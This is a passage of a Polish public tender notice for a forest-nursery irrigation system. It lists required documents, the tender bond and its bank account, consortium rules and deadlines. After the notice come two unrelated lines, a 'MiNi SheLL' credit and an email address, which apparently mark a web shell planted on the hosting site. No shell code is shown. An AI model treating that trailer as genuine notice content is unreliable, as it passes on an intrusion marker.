pkt 1 PZP, wystawionenie wcześniej niż 3 m-ce przed jego<br/>złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne<br/>wraz z zaświad albo innym do. dokumenty potwierdzające, żeprzed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezp. społ. lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozum. w sprawie spłat tychnależności,-k)odpis lub informacje z KRS<br/>lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed<br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,-l)oświadczenia wyk. oaktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP złożonym na<br/>oświadczeniu), w zakresie podstawwykluczenia z postępowania określonych w: a) art. 108 ust. 1 pkt 3<br/>PZP, b) art. 108 ust. 1 pkt 4 PZP odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapob, c) art. 108 ust. 1 pkt 5 PZP odnośnie do zawarcia z innymi wyk.porozumienia mającego na celu zakłócenie konkurencji, d) art. 109 ust. 1 pkt 1 PZP odnośnie naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r.<br/>o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.), e) art. 109 ust. 1<br/>pkt 2 lit b) odnośnie do skazania za wykroczenie, za które wymierzone karę ograniczenia wolności lub<br/>karę grzywny, f) art. 109ust. 1 pkt 2 lit c PZP, g) art. 109 ust. 1 pkt 3 PZP ustawy odnośnie do skazania<br/>za wykroczenie, za które wymierzone karę ograniczenia wolności lub karę grzywny, h) art. 109 ust. 1 pkt 5-10 PZP - (wzór zał. nr 5b do SWZ). Szczegóły w pkt 9 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca będzie obowiązany złożyć w terminie wskazanym przezZamawiającego, nie krótszym niż<br/>5 dni:aktualne na dzień ich złożenia:-a) oświadczenie Wykonawcy októrym mowa w art.125 ust.1 PZP<br/>potwierdzające brak podstaw wykluczenia i spełnienie warunkówudziału w postępowania, na dzień<br/>składania ofert, które stanowi dowód tymczasowo zastępującywymagane przez Zamawiającego<br/>podmiotowe środki dowodowe (wg wzoru zał nr 4 do SWZ)-b) wykazrobót budowlanych wykonanych<br/>nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane (wzór wykazu wykonanych robót budowlanych stanowi zał nr 5 do<br/>SWZ).Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych<br/>wspólnie z innymi wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa<br/>wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.-c) dowody, że wskazane przez<br/>Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot.<br/>zdolności technicznej lub zawodowej w zakresiedoświadczenia zostały wykonane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z u przyczyn niezależnych<br/>od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty -d)informację<br/>banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych<br/>środków finansowych lub zdolność kredytową Wykonawcy, wokresie nie wcześniejszym niż 3 miesiące<br/>przed jej złożeniem.Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środkówdowodowych, o których mowa w pkt 9.1. lit d) SWZ,<br/>Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają<br/>spełnienie opisanego przez Zamawiającegowarunku udziału w postępowaniu dotyczącego sytuacji<br/>ekonomicznej lub finansowej.-e) wykaz osób, skierowanych przez Wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi,<br/>wraz z informacjami na temat ich kwalifikacjizawodowych, posiadanych uprawnień, doświadczenia i<br/>wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami (wzór wykazu osób<br/>skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 6 do SWZ),Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. ppkt 2) lub sytuacji finansowej (warunki wskazane w pkt 7.1. ppkt 1 SWZ) podmiotów udostępniających zasoby,<br/>składa wraz z ofertą:1)zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.2)oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu (w zakresie<br/>warunku, w stosunku do którego udostępnia swój potencjał) -wg załącznika nr 7do SWZ.Wykonawca,<br/>który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. ppkt 2) lub sytuacji finansowej (warunki wskazane w pkt 7.1. ppkt 1 SWZ) na zasadach określonych w art. 118<br/>PZP zobowiązany będzie do przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 9.1. lit g, i-l SWZ, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) formularz Oferty (sporządzony wg wzoru załącznik nr 8 do SWZ) sporządzony pod rygorem nieważności, w formie elektronicznej, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>b)zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny <br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, <br/>będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.2. SWZ<br/>(ich), jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu <br/>polega na zdolnościach lub sytuacji innych podmiotów; (Niewiążący wzór zobowiązania <br/>do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania <br/>zamówienia stanowi załącznik nr 5a do SWZ)<br/>c) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że <br/>osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. <br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu <br/>poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i <br/>ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp <br/>do tych dokumentów<br/>d)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania <br/>Wykonawcy, osoby działającej w imieniu wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia lub osoby działającej w imieniu podmiotu udostępniającego <br/>zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP - działa osoba, <br/>której umocowanie do jego reprezentowania nie wynika z dokumentów, o których <br/>mowa w pkt 13.4. lit e) SWZ, sporządzone w sposób określony w pkt 9 SWZ.<br/>e) oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które dostawy<br/>wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających <br/>się o udzielenie zamówienia.<br/>f) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem <br/>elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca <br/>wnosi wadium w formie niepieniężnej).<br/>g) oświadczenie –wg załącznika nr 12 do SWZ złożone pod rygorem nieważności, w <br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu <br/>składającego oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>-Informacja dot. tajemnicy przedsiębiorstwa- uzasadnienie /jeśli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.1. Zamawiający wymaga wniesienia wadium w wysokości: 30 000,00 zł <br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie <br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 <br/>ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/>11.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy <br/>Zamawiającego w banku BNP Paribas nr rachunku: 34 2030 0045 1110 0000 0021 2990 z <br/>dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Wykonanie deszczowni <br/>stałej na Szkółce Leśnej”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w <br/>podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium <br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub <br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z <br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno <br/>wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w <br/>terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty <br/>wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) <br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. <br/>opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego <br/>wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta <br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie <br/>będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży <br/>wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie <br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>11.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia <br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających <br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie <br/>kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w <br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9.3. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>(konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba <br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. <br/>Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść <br/>pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia o których mowa w art.125 ust 1 ustawy PZP składa każdy z <br/>wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają <br/>brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej <br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.1. g-l obowiązany będzie złożyć każdy z <br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić <br/>odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród <br/>siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, <br/>otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich <br/>partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy <br/>w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia łącznie lub każdego z osobna<br/><br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej <br/>postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>(konsorcjum) stosuje się odpowiednio, z zastrzeżeniem, że do odpowiedzi na wezwanie <br/>Zamawiającego do złożenia dokumentów, o którym mowa w pkt 9.1. należy załączyć (1) <br/>zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, iż Wykonawca <br/>nie zalega z opłacaniem podatków i opłat, wystawione nie wcześniej niż 3 miesiące przed <br/>jego złożeniem, a w przypadku zalegania z opłacaniem podatków i opłat wraz z <br/>zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert <br/>wykonawca dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub <br/>zawarł wiążące porozumienie w sprawie spłat tych należności oraz (2) zaświadczenie <br/>właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy <br/>Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że <br/>Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w <br/>zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego <br/>złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub <br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem dokumenty potwierdzające, że <br/>odpowiednio przed upływem terminu składnia ofert Wykonawca dokonał płatności należnych <br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub <br/>zawarł wiążące porozumienie w sprawie spłat tych należności - odrębnie dla każdego ze <br/>wspólników oraz odrębnie dla spółki <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 18.1. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór <br/>umowy stanowiący załącznik nr 10 do SWZ.<br/>18.2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje <br/>możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie <br/>której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z <br/>okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków <br/>ich wprowadzenia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-17 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-17 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zabezpieczenie należytego wykonania umowy wynosić będzie 4 % ceny oferty. Zamawiający wykluczy z postępowania<br/>Wykonawców o których mowa w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r.o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. z 2022 r., poz. 835). Zamawiający w ramach weryfikacji braku zaistnienia tej podstawy<br/>wykluczenia, może dokonać za pomocą wszelkich dostępnych środków jak na przykład ogólnodostępnych rejestrów tj.<br/>Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej czy Centralny Rejestr<br/>Beneficjentów Rzeczywistych.<br/>Skrócenie terminu wykonania zamówienia- jedno z kryterium oceny ofert (wskazanie w ofercie zgodnie z SWZ). Wartość zamówienia netto wskazana w ogłoszeniu obejmuje zamówienie podstawowe i<br/>podobne (szacowana wartość zamówienia podstawowego wynosi 2 550 099,12 netto zł)

Creat By MiNi SheLL
Email: jattceo@gmail.com